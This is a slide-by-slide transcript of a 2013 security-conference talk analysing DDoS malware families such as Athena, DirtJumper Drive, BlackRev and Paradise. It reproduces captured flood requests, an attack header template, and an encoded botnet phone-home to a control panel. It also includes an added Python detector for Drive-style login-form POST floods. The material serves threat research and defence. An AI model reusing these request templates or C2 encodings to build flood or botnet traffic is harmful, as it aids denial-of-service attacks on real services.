Recent Advancements in DDoS Malware
Jason Jones, Usenix LEET '13



DESCRIPTION

This presentation explores advancements in DDoS Malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. This presentation was originally shared at Usenix LEET '13.


Page 1: Recent Advancements in DDoS Malware

Jason Jones, Usenix LEET '13

Page 2: Agenda

• Who am I?
• Why?
• What Hasn’t Changed
• What Has Changed
  – Better Blending In & Hiding
  – Better Botnet Building
  – Better Protection
• Trends and Takeaways

Page 3: Who am I?

• Jason Jones
  – Security Research Analyst on Arbor Networks’ ASERT
  – Presented at
    • BlackHat USA 2012
    • InfoSec Southwest 2013
  – Research interests
    • IP reputation
    • Malware clustering
    • Data mining
    • Graph theory / combinatorics

Page 4: ASERT Malware Corral

• Arbor Security Engineering & Response Team (ASERT)
• ASERT Malware Corral
  – Malware storage and processing system
  – Processing via sandbox and static methods
  – Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 unique family names tagged last year
  – Includes DDoS, bankers, infostealers, APT, etc.

Page 5: Why?

• DDoS becoming more of a threat
  – Spamhaus
  – “Triple Crown”
  – Political motivations
  – Anon Ops
  – Ransom
• DDoS-specific malware evolving in response to our response

Page 6: What Hasn’t Changed

Page 7: Still the same…

• Most malware includes
  – Basic GET/POST flood
  – SYN and/or connection flood
  – UDP flood
• Lots of IRC CnC still around
• Many use a hard-coded set of user-agents
• Still broken (the implementations still don’t work as intended)
  – Slowloris
  – ARME

Page 8: Still the same… (cont.)

• .NET malware is still terrible
  – Most decompiles fine in .NET Reflector
  – Uses .NET HTTP methods
  – Looks mostly the same for DDoS
• Gh0st RAT variants still popular
• Most are not fully protocol aware
• Many don’t do SSL / HTTPS
• Copy + paste still prevalent

Page 9: What Has Changed

Page 10: Better Blending In & Hiding on the Network

• HTTP CnC has always been popular
  – Tended to be plaintext
  – Athena recently moved from IRC -> HTTP
    • Obfuscates commands
    • Example (form parameters of an Athena HTTP phone-home; a and c are percent-encoded ASCII, b is base64 whose lowercase letters have been substituted):
      – a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
      – b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
      – c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
  – Betabot employs encryption on phone-home
• Adjustable phone-home intervals
  – Specify long intervals to avoid suspicion

Page 11: Better Blending In & Hiding on the Network (cont.)

• More intelligent HTTP attacks
  – Requests look more legitimate now
    • Drive uses randomization in UAs
    • Athena uses a long list of legitimate UAs
  – More dynamic headers
    • Paradise borrowed from Armageddon2
  – Ability to specify POST parameters
    • Target search boxes, login forms, etc.
    • Use up DB queries, server processing
    • Randomized per request, avoid caching

Page 12: Example – DirtJumper Drive POST Attack

POST /test HTTP/1.1
Host: 192.168.56.1:10000
User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://192.168.56.1:10000/
Content-Length: 2443
Content-Type: application/x-www-form-urlencoded

login=…&…

Parameter names and value lengths in the body (the bracketed number is the length of the random value sent for that parameter; 2350 bytes of values plus 76 bytes of names and 17 separators give the Content-Length of 2443):
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
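The parameter shape above is itself a detection hook: a real login form posts one or two credential fields under one naming convention, not nine conventions at once, and not 50 to 1000 random characters in each. As an added example (not code from the deck or from Arbor/ASERT), the following Python rebuilds a stand-in for the elided body from the listed names and value lengths and flags bodies that carry several credential-style names with long values in one request. The field-name list, the thresholds and the function names are the example's own assumptions, and the benign body is constructed for comparison.

```python
import random
import string
from urllib.parse import parse_qsl

# Credential-style parameter names taken from the Drive POST body on this slide.
CREDENTIAL_NAMES = {
    "login", "pass", "password", "log", "passwrd", "user", "username",
    "vb_login_username", "vb_login_md5password",
}

# (name, length of the random value) as listed on the slide; 9 names, 2350 value bytes.
DRIVE_VALUE_LENGTHS = [
    ("login", 1000), ("pass", 1000), ("password", 50), ("log", 50),
    ("passwrd", 50), ("user", 50), ("username", 50),
    ("vb_login_username", 50), ("vb_login_md5password", 50),
]


def post_body_shape(body):
    """Summarise an application/x-www-form-urlencoded body: which credential-style
    names it carries and how many values are long. parse_qsl keeps duplicate names
    and percent-decodes, so lengths are measured on the decoded values."""
    params = parse_qsl(body, keep_blank_values=True)
    return {
        "param_count": len(params),
        "credential_names": [k for k, _ in params if k.lower() in CREDENTIAL_NAMES],
        "long_values": sum(1 for _, v in params if len(v) >= 50),
        "body_length": len(body),
    }


def looks_like_drive_post_flood(body, min_cred_names=4, min_long_values=4):
    """Heuristic (thresholds are assumptions tuned to this sample): several distinct
    credential-style field names AND several long values in the same request."""
    shape = post_body_shape(body)
    return (len(set(shape["credential_names"])) >= min_cred_names
            and shape["long_values"] >= min_long_values)


def build_drive_body(seed=0):
    """Constructed stand-in for the elided slide body: random alphanumerics of the
    stated lengths. Alphanumerics need no percent-encoding, so the body length
    equals the slide's Content-Length of 2443."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + string.digits
    return "&".join(
        name + "=" + "".join(rng.choice(alphabet) for _ in range(n))
        for name, n in DRIVE_VALUE_LENGTHS
    )


# Constructed benign login POST for comparison (not from the slide).
BENIGN_BODY = "username=alice&password=correct+horse&remember=1"

if __name__ == "__main__":
    for label, body in (("drive", build_drive_body()), ("benign", BENIGN_BODY)):
        print(label, post_body_shape(body), looks_like_drive_post_flood(body))
```

The check deliberately ignores the User-Agent and Referer, which Drive randomizes (slide 11); the body shape is what the attack cannot easily hide while still exhausting the login handler.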

Page 13: Example – BlackRev

GET /index.html HTTP/1.1
Host: victim.com
Keep-Alive: 266
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
Referer: http://victim.com/
Cookie: PHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Page 14: Athena IRC + HTTP – HTTP Attack Request Template

Alternatives for a header are separated by "|"; angle brackets mark values filled in per attack:

GET|POST|HEAD /<params> HTTP/1.1
Host: <target>
Range: bytes=<range bytes string>
Connection: Keep-alive | close
User-Agent: ObtainUserAgentString()
Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public | private | max-stale
Vary: * | User-Agent
Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c | text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1
Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip
Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en
Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif
Content-Length: <length>
X-a: b

Page 15: Example – Athena HTTP Phone Home

POST /gate.php HTTP/1.1
Host: panel-gc.co.uk:69
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
Content-Length: 436

a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8

Decoded phone-home data:
• |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|ver:v1.0.3|net:4.0|
• |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|

Page 16: Example – Paradise

Header-value lists pulled by the bot (status=headers), grouped as they appear:

status=headers

Accept:
application/xml, image/png, text/html
*/*, text/html, text/html, application/xml
text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c

Accept-Encoding:
x-gzip, identity
x-compress, x-zip, sdch
x-compress ,deflate, gzip, x-gzip

Accept-Language:
us-ua;q=0.5
az-us;q=0.9

User-Agent:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Referer:
http://www.snpp.com/
http://ask.fm/FlOoRNOoBlE
http://www.thesimpsons.com/
http://mylarha.deviantart.com/
http://www.thesimpsonslatino.com/

Page 17: Building Better Botnets

• Use what’s readily available
  – “Triple Crown” financial attacks
    • Tiered CnC structure
    • Dynamically update code with new attacks
    • Can easily adjust attacks if the current attack is unsuccessful
  – Spamhaus DNS amplification
    • Open resolvers
    • Not a botnet per se, but…
    • Highly successful

Page 18: Better Protections

• Store attacks in an external DLL
  – Paradise: pulled down by the main EXE
  – DLL is crypted
• Restrict bots to geo regions
  – Also blackholing connections
• Drop other malware on the same machine
• Previously mentioned obfuscating / encrypting phone-home
• More malware using encryption internal to the binary
• More packers / obfuscations used

Page 19: Better Protections (cont.)

• More junk code
• New Drive variant discards old phone home
  – 2-stage phone home
  – Base64 + underlying protection
  – 3 new attacks
  – Can now specify hard-coded or random Cookie values
  – Still reversing…
  – Blog soon?

Page 20: Trends and Takeaways

Page 21: Trends and Takeaways

• DDoS becoming more of a feature of larger families
  – Still plenty of standalone, but becoming more common in other malware
• DNS amplification will likely make its way into malware soon
  – Too successful not to
  – Too easy not to
• More booter services popping up
  – Many Athena HTTP CnC hostnames appear to be booter backends
• Carberp source code leak will likely create a boom in Carberp variants, similar to ZeuS

Page 22: More Trends and Takeaways…

• Traditional botnets with DDoS add-ons don’t DDoS much
  – DarkComet
  – Some Athena HTTP used mostly to drop other malware
    • Nitol, Betabot, Andromeda, ZeuS
    • Appear to be botnet-for-hire types
• Still waiting for the first SPDY-aware malware :)
• Proper mobile DDoS botnet soon?

Page 23: Questions/Comments/Feedback

• [email protected]
• @jasonljones

Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas

Page 24: Thank You!